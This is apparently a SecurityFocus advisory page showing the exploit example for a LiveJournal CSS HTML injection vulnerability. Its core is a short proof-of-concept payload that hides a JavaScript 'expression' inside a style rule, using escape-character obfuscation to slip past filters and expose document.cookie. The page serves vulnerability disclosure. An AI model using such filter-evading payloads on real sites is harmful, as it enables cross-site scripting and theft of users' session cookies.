info
discussion
exploit
solution
references
LiveJournal CSS HTML Injection Vulnerability
The following example was provided:
<style>
.test1 { color:e\xpression(alert(document.cookie)); }
</style>
<a class="test1">foo</a>
Privacy Statement
Copyright 2010, SecurityFocus